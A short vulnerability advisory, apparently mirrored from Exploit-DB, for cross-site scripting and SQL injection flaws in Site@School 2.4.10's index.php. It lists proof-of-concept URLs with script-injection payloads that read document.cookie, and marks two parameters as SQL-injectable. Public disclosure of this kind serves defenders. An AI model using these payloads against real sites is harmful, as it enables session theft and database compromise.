Site@School 2.4.10 – ‘/index.php’ Cross-Site Scripting / SQL Injection

  • 作者: Stefan Schurtz
    日期: 2011-10-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36240/
  • source: https://www.securityfocus.com/bid/50195/info
    
    Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
    
    Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
    
    XSS:
    
    http://www.example.com/school/starnet/index.php?option=stats&suboption='"</style></script><script>alert(document.cookie)</script> 
    
    http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site='"</style></script><script>alert(document.cookie)</script> 
    
    http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> 
    
    http://www.example.com/school/starnet/index.php?option=modulemanager&module='"</style></script><script>alert(document.cookie)</script>
    
    SQL Injection:
    
    http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]
    
    http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]